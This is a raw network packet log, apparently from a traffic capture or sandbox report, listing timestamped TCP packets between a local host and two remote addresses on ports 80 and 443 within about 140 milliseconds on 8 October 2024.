Oct 8, 2024 20:47:25.166964054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166974068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167010069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167016029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167051077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167062998 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167087078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167095900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167124033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167131901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167157888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167170048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167192936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167203903 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167228937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167241096 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167265892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167282104 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167295933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167313099 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167340994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167347908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167382002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167396069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167437077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167448997 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167470932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167481899 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167505026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167519093 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167537928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167552948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167583942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167592049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167622089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167639017 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167653084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167668104 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167687893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167697906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167722940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167736053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167757034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167768955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167804003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167809963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167843103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167856932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167889118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167895079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167928934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167942047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167960882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.167975903 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.167999983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.168008089 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.168035030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.168045998 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.168070078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.168078899 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.168102980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.168116093 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.168138981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.168148041 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.168184042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.169523001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.169557095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.169580936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.169603109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.169610023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.169644117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.169660091 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.169693947 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.169699907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.169734001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.169749975 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.169768095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.169781923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.169817924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.169836044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.169868946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.218031883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.218060970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.218072891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.218127966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.218138933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.218147993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.218162060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.218169928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.218221903 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.218250036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.218260050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.218298912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.218540907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.218588114 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.218590021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.218601942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.218635082 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.218699932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.218712091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.218722105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.218748093 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.218763113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.218803883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.218843937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.234455109 CEST	443	49790	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.234977007 CEST	49790	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.235001087 CEST	443	49790	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.235409975 CEST	49790	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.235414982 CEST	443	49790	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.252002954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252042055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252082109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252093077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252110004 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252123117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252152920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252168894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252186060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252211094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252222061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252242088 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252249956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252275944 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252279997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252305984 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252309084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252332926 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252351046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252357960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252387047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252417088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252435923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252449036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252465963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252494097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252496004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252525091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252543926 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252553940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252573013 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252583027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252607107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252614021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252624989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252648115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252660990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252676964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252692938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252707005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252720118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252749920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252865076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252893925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252908945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252924919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252938986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252954960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.252969027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.252984047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253000021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253015041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253027916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253057957 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253061056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253093004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253103971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253128052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253135920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253154039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253170013 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253181934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253197908 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253212929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253226042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253242970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253257990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253272057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253285885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253303051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253314972 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253348112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253365993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253396034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253411055 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253424883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253441095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253454924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253468990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253484011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253496885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253514051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253529072 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253544092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253556967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253573895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253587961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253618002 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253710985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253740072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253757000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253768921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253782034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253798962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253813982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253828049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253843069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253858089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253871918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253890038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253907919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253918886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253932953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253947973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253963947 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.253974915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.253990889 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254017115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254128933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254158020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254174948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254189014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254201889 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254220963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254235983 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254250050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254265070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254281044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254295111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254295111 CEST	443	49789	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.254311085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254328012 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254339933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254358053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254369974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254388094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254399061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254414082 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254441023 CEST	443	49789	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.254445076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254472971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254492044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254503965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254507065 CEST	49789	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.254524946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254534006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254549980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254568100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254575014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254606009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254612923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254645109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254652977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254672050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254683018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254705906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254713058 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254740953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254743099 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254770041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254780054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254806995 CEST	49789	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.254813910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254817963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254826069 CEST	443	49789	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.254846096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254848003 CEST	49789	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.254856110 CEST	443	49789	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.254875898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254878044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254890919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254905939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254924059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254936934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254950047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254967928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.254977942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.254997969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.255007982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.255029917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.255038023 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.255059004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.255070925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.255089998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.255098104 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.255131960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.255592108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.255606890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.255621910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.255637884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.255655050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.255656004 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.255666971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.255678892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.255697012 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.255718946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.256520033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.256577969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.256591082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.256602049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.256635904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.256654024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.256689072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.256730080 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.256777048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.256788015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.256800890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.256810904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.256829977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.256844044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.257920980 CEST	49793	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.257970095 CEST	443	49793	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.258044004 CEST	49793	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.258162022 CEST	49793	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.258169889 CEST	443	49793	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.269850016 CEST	443	49788	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.270070076 CEST	443	49788	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.270277977 CEST	49788	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.270313978 CEST	49788	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.270334959 CEST	443	49788	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.270344973 CEST	49788	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.270349979 CEST	443	49788	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.272680044 CEST	49794	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.272707939 CEST	443	49794	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.272785902 CEST	49794	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.272887945 CEST	49794	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.272897005 CEST	443	49794	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.305388927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.305448055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.305483103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.305499077 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.305514097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.305527925 CEST	49755	80	192.168.2.5	95.164.90.97
